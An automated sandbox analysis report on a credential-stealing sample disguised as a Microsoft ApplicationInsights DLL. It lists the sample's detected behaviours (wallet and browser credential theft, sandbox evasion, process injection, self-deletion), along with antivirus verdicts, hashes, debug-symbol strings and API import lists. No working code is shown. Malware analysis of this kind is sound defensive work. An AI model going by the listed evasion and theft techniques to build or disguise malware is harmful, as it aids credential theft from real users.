Windows Analysis Report Microsoft.ApplicationInsights.PersistenceChannel.dll

Overview

General Information

Sample Name: Microsoft.ApplicationInsights.PersistenceChannel.dll (renamed file extension from dll to exe)
Analysis ID: 482276
MD5: 14e351015c5d632f888dbcac03871fae
SHA1: b5471c5eea356ce87ac5c2df8bbd9bc72cf84da9
SHA256: 977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa
Tags: exeOuterJoinSrlsigned
Infos:

Most interesting Screenshot:

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 47
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Self deletion via cmd delete
.NET source code contains very large array initializations
Contains functionality to detect sleep reduction / modifications
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
PE file contains more sections than normal
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Virustotal: Detection: 40% Perma Link
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe ReversingLabs: Detection: 28%
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f6a6e0.9.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f8a700.25.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f6a6e0.9.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f6a6e0.23.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f8a700.11.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f8a700.10.unpack Avira: Label: TR/Patched.Ren.Gen

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_004062D0 CryptUnprotectData,LocalAlloc,LocalFree, 2_2_004062D0
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00406230 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 2_2_00406230
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00405F50 CryptUnprotectData, 2_2_00405F50
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00406560 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 2_2_00406560
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00403BE0 memset,CryptStringToBinaryA,CryptStringToBinaryA, 2_2_00403BE0

Compliance:

barindex
Uses 32bit PE files
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
PE / OLE file has a valid certificate
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Static PE information: certificate valid
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: KC:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: C:\Windows\dll\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000B.00000003.699534963.00000000050EA000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdba source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source: Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000B.00000003.699575783.00000000031A6000.00000004.00000001.sdmp
Source: Binary string: moryProtection.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: isualBasic.pdbW source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: ml.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: .ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: clr.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Windows.Forms.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: ility.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source: Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdbeChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: System.pdb"" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: System.Windows.Forms.pdb8 source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbt/ source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: System.Runtime.Remoting.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: w.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdbm source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdbdr source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdbCO source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: InC:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdbT3}l source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: sechost.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.711688780.0000000005644000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Drawing.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.pdbH source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: \??\C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdbf9z source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: System.Configuration.pdbD source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000B.00000003.699953933.00000000031B2000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: Accessibility.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: System.Runtime.Remoting.pdblrP source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: msvcr120_clr0400.i386.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdbpdbnel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdb{{ source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: Windows.Storage.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: comctl32v582.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: Accessibility.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: C:\Windows\Resources\new\Repo\Debug\private\RUNPE\JabrezRPE\JabrezRPE\obj\Debug\RunPE_MemoryProtection.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.736476721.0000000003F32000.00000004.00000001.sdmp
Source: Binary string: rawing.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: shell32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb\ source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: userenv.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: RunPE_MemoryProtection.pdbFyg source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: ore.pdb, source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: uilds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: System.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000B.00000003.699575783.00000000031A6000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdbR source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: \??\C:\Windows\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdboq source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.Runtime.Remoting.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: version.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: RunPE_MemoryProtection.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: ore.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdbd source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: rawing.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000B.00000003.699980162.00000000031B8000.00000004.00000001.sdmp
Source: Binary string: Amsi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Drawing.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: combase.pdbk source: WerFault.exe, 0000000B.00000003.711688780.0000000005644000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbrt- source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: untime.Remoting.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: cryptbase.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00401000 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 2_2_00401000
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00408820 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose, 2_2_00408820
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00407560 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00407560
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_004011F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 2_2_004011F0
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00408650 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00408650
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00408410 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_00408410
